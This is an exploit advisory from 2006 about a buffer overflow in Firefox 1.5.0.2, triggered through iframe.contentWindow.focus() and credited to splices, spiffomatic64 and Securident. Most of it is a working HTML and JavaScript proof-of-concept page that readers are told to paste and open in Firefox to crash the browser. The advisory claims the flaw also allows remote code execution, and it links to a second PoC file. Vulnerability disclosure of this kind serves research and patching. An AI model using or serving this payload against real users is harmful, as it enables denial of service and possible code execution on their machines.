Rated as : Critical
<!--
---------------------------------------------------
Software:
Firefox Web Browser
Tested:
Linux, Windows clients' version 1.5.0.2
Result:
Firefox Remote Code Execution and Denial of Service - Vendor contacted,
no patch yet.
Problem:
A handling issue exists in how Firefox handles certain Javascript in
js320.dll and xpcom_core.dll
regarding iframe.contentWindow.focus(). By manipulating this feature a
buffer overflow will occur.
Proof of Concept:
http://www.securident.com/vuln/ff.txt
Credits:
splices(splices [dot] org)
spiffomatic64(spiffomatic64 [dot] com)
Securident Technologies (securident [dot] com)
------------------------------------------------
http://www.securident.com/vuln/ffdos.htm - PoC firefox dos
Paste the below code snippet and view it in Firefox for DoS PoC or visit
the link above. -->
<textarea cols="0" rows="0"
id="x_OtherInfo"
name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
<!--
-DISCLAIMER-
splices,spiffomatic64, and securident are not responsible for any of the
information contained therein,
this is all just for informational purposes only. -->
securitydot.net - 2006-04-24
|
